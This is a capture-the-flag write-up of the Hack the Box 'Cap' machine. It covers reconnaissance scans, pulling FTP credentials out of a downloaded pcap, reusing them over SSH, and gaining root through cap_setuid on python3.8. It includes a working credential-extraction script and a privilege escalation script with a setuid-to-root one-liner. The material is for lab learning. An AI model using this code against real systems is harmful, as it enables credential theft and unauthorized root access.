Cap Lab

Hack the Box Penetration Lab

Reconnaissance

First up, a port scan:

┌──(zero㉿zero)-[~]
└─$ rustscan 10.10.10.245
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
Faster Nmap scanning with Rust.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/zero/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.10.245:21
Open 10.10.10.245:22
Open 10.10.10.245:80
[~] Starting Nmap
[>] The Nmap command to be run is nmap -vvv -p 21,22,80 10.10.10.245

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-14 05:49 PDT
Initiating Ping Scan at 05:49
Scanning 10.10.10.245 [4 ports]
Completed Ping Scan at 05:49, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:49
Completed Parallel DNS resolution of 1 host. at 05:49, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 05:49
Scanning 10.10.10.245 [3 ports]
Discovered open port 80/tcp on 10.10.10.245
Discovered open port 21/tcp on 10.10.10.245
Discovered open port 22/tcp on 10.10.10.245
Completed SYN Stealth Scan at 05:49, 0.27s elapsed (3 total ports)
Nmap scan report for 10.10.10.245
Host is up, received echo-reply ttl 63 (0.13s latency).
Scanned at 2024-10-14 05:49:03 PDT for 1s

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 63
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.52 seconds
           Raw packets sent: 7 (284B) | Rcvd: 6 (240B)

It looks like there are a few open ports that I might want to test, but first it's best to see where the IP address leads in a browser.


It seems to be an exposed security dashboard. Not good. Let's quickly run a feroxbuster scan and see what else I can find.

Nothing that immediately stands out was revealed; most of the URLs link to pages I can already access. So it's time to poke around and see what the open ports can provide.

I then tried to connect to the FTP server to see if there was an anonymous login I could use.

Interestingly enough, the banner gave away the version number of the FTP server. A quick Google for exploits sadly turned up nothing other than a denial-of-service bug (CVE-2021-30047).

After looking around a few of the pages I noticed there was a file available to download, a pcap file to be exact.


Initially it didn't yield much, but the URL of the page suggested there could be additional pages of data hidden from view. If there was a data set 1, maybe there were more?

2, 3 and 4 didn’t result in anything. But 0 did.


There were now values associated with the Data Types. Time to download this new pcap file and see what I could find!


Perfect, this file contains a ton of information that I can scan through to find something that helps me get a foothold. After a brief search I discovered someone logging into that FTP server that I was unable to access before.

A user named nathan, with the password written in the clear right below it, because FTP sends both USER and PASS unencrypted. Success.
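To show what "reading the credentials out of the capture" looks like without Wireshark, here is an added example (not part of the original write-up): a minimal libpcap parser that walks Ethernet/IPv4/TCP frames, pairs each FTP USER with the PASS that follows it on the same client session, and returns the logins. The capture it runs on is constructed inline, and the password, IPs and server banner in it are placeholders, not the box's real values.

```python
import struct

FTP_PORT = 21

# --- constructed sample traffic (placeholder credentials, not the box's real ones) ---

def _tcp_frame(payload, src, dst, sport, dport):
    """Build an Ethernet/IPv4/TCP frame carrying payload (checksums left at zero)."""
    eth = b"\x00" * 12 + b"\x08\x00"  # dst MAC, src MAC, EtherType IPv4
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0, src, dst) + tcp
    return eth + ip

def build_pcap(frames):
    """Wrap raw frames in a little-endian classic libpcap file (link type 1 = Ethernet)."""
    out = bytearray(struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1))
    for ts, frame in enumerate(frames):
        out += struct.pack("<IIII", ts, 0, len(frame), len(frame)) + frame
    return bytes(out)

CLIENT, SERVER = bytes([10, 10, 14, 1]), bytes([10, 10, 10, 245])  # constructed addresses
SAMPLE_PCAP = build_pcap([
    _tcp_frame(b"220 FTP server ready\r\n", SERVER, CLIENT, 21, 40000),
    _tcp_frame(b"USER nathan\r\n", CLIENT, SERVER, 40000, 21),
    _tcp_frame(b"331 Please specify the password.\r\n", SERVER, CLIENT, 21, 40000),
    _tcp_frame(b"PASS example-placeholder\r\n", CLIENT, SERVER, 40000, 21),
    _tcp_frame(b"PASS orphan\r\n", CLIENT, SERVER, 40001, 21),  # PASS with no USER on this session: ignored
])

# --- the parser ---

def iter_frames(pcap):
    """Yield (link_type, frame_bytes) for each record of a classic libpcap file."""
    magic, = struct.unpack_from("<I", pcap, 0)
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic libpcap file (pcapng is not handled here)")
    link_type, = struct.unpack_from(endian + "I", pcap, 20)
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack_from(endian + "IIII", pcap, off)
        off += 16
        yield link_type, pcap[off:off + incl_len]
        off += incl_len

def tcp_segment(link_type, frame):
    """Return (src_ip, sport, dport, payload) for an Ethernet/IPv4/TCP frame, else None."""
    if link_type != 1 or len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[0] >> 4 != 4 or ip[9] != 6:  # IPv4 only, protocol 6 = TCP
        return None
    total_len, = struct.unpack_from("!H", ip, 2)
    tcp = ip[ihl:total_len]
    if len(tcp) < 20:
        return None
    sport, dport = struct.unpack_from("!HH", tcp, 0)
    data_off = (tcp[12] >> 4) * 4
    return ip[12:16], sport, dport, tcp[data_off:]

def extract_ftp_credentials(pcap, ftp_port=FTP_PORT):
    """Pair USER/PASS commands per client session; return a list of (user, password)."""
    pending, found = {}, []
    for link_type, frame in iter_frames(pcap):
        seg = tcp_segment(link_type, frame)
        if seg is None:
            continue
        src, sport, dport, payload = seg
        if dport != ftp_port or not payload:  # only client -> server control traffic
            continue
        session = (src, sport)
        for line in payload.split(b"\r\n"):
            cmd, _, arg = line.partition(b" ")
            if cmd.upper() == b"USER":
                pending[session] = arg.decode("utf-8", "replace")
            elif cmd.upper() == b"PASS" and session in pending:
                found.append((pending.pop(session), arg.decode("utf-8", "replace")))
    return found

if __name__ == "__main__":
    for user, password in extract_ftp_credentials(SAMPLE_PCAP):
        print(f"FTP login seen in the clear: {user} / {password}")
```

To run it against the file from the box, replace SAMPLE_PCAP with `open("0.pcap", "rb").read()`; the same USER/PASS pairing is what Wireshark's "Follow TCP Stream" shows you by hand.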

After trying to log into the FTP server several times with different parameters, it kept kicking me out. I am not sure why, so my next thought was to try SSH with the same credentials, since some users foolishly reuse the same password for everything.

Turns out they do use the same password. And now I have the user flag!

Privilege escalation

Now to try and get the root flag! First I am going to upload and run LinPEAS to look for any vulnerabilities that could lead to root access.

After running LinPEAS on the target system, it flagged something we can use to get root access: the python3.8 binary has the cap_setuid capability set on it. That capability lets a process change its own user ID (it has nothing to do with the process ID), so any user who can run that interpreter can call setuid(0) from a short script and spawn a shell that runs as root.
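As an added example (not from the original write-up or from LinPEAS), the script below does the two things a practitioner wants at this point: it decodes the capability bitmask that LinPEAS and getcap report, and it performs the escalation itself when run under an interpreter that carries cap_setuid. The getcap lines in the test are constructed; the only assumption is that the target binary carries the capability in its effective set, which is what the os.setuid call relies on.

```python
import os
import re

CAP_SETUID = 7  # bit index from <linux/capability.h>

def caps_from_hex(mask_hex):
    """Decode a CapEff/CapPrm value from /proc/<pid>/status into a set of bit indices."""
    mask = int(mask_hex, 16)
    return {i for i in range(64) if (mask >> i) & 1}

def has_cap_setuid(mask_hex):
    return CAP_SETUID in caps_from_hex(mask_hex)

def parse_getcap(output):
    """Return binaries whose *effective* set includes cap_setuid.

    Accepts both getcap output styles:
      /usr/bin/python3.8 = cap_setuid+ep   (older libcap)
      /usr/bin/python3.8 cap_setuid=ep     (libcap >= 2.41)
    A permitted-only capability (+p) is not enough for os.setuid() to work
    without first raising it, so those lines are not reported."""
    hits = []
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        path, _, rest = line.partition(" ")
        rest = rest.lstrip("= ").strip()
        for clause in rest.split():
            m = re.match(r"([\w,]+)([+=-])(\w*)$", clause)
            if not m:
                continue
            names, _, flags = m.groups()
            if "cap_setuid" in names.split(",") and "e" in flags:
                hits.append(path)
                break
    return hits

def own_effective_caps():
    """Read this process's CapEff from /proc/self/status (Linux only)."""
    with open("/proc/self/status") as f:
        for line in f:
            if line.startswith("CapEff:"):
                return caps_from_hex(line.split()[1])
    return set()

def escalate_via_setuid(shell="/bin/sh"):
    """The whole privilege escalation: run this under the capable interpreter
    (python3.8 -c '...' on the box). cap_setuid lets an unprivileged process
    set its real and effective UID to 0; exec'ing a shell afterwards keeps it."""
    os.setuid(0)
    os.execv(shell, [shell])

if __name__ == "__main__":
    if os.geteuid() != 0 and CAP_SETUID in own_effective_caps():
        print("interpreter holds cap_setuid in its effective set; escalating")
        escalate_via_setuid()
    else:
        print("no cap_setuid on this interpreter; run `getcap -r / 2>/dev/null` and "
              "feed the output to parse_getcap() to find one that has it")
```

On the box the equivalent one-liner is `python3.8 -c 'import os; os.setuid(0); os.execv("/bin/sh", ["/bin/sh"])'`; the script above only adds the check that tells you beforehand whether the interpreter you are about to use actually carries the capability.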

After gaining root access I got the flag to finish the box! It's pretty important to make sure your binaries don't carry file capabilities like this: granting cap_setuid to a general-purpose interpreter is as good as making it setuid root.
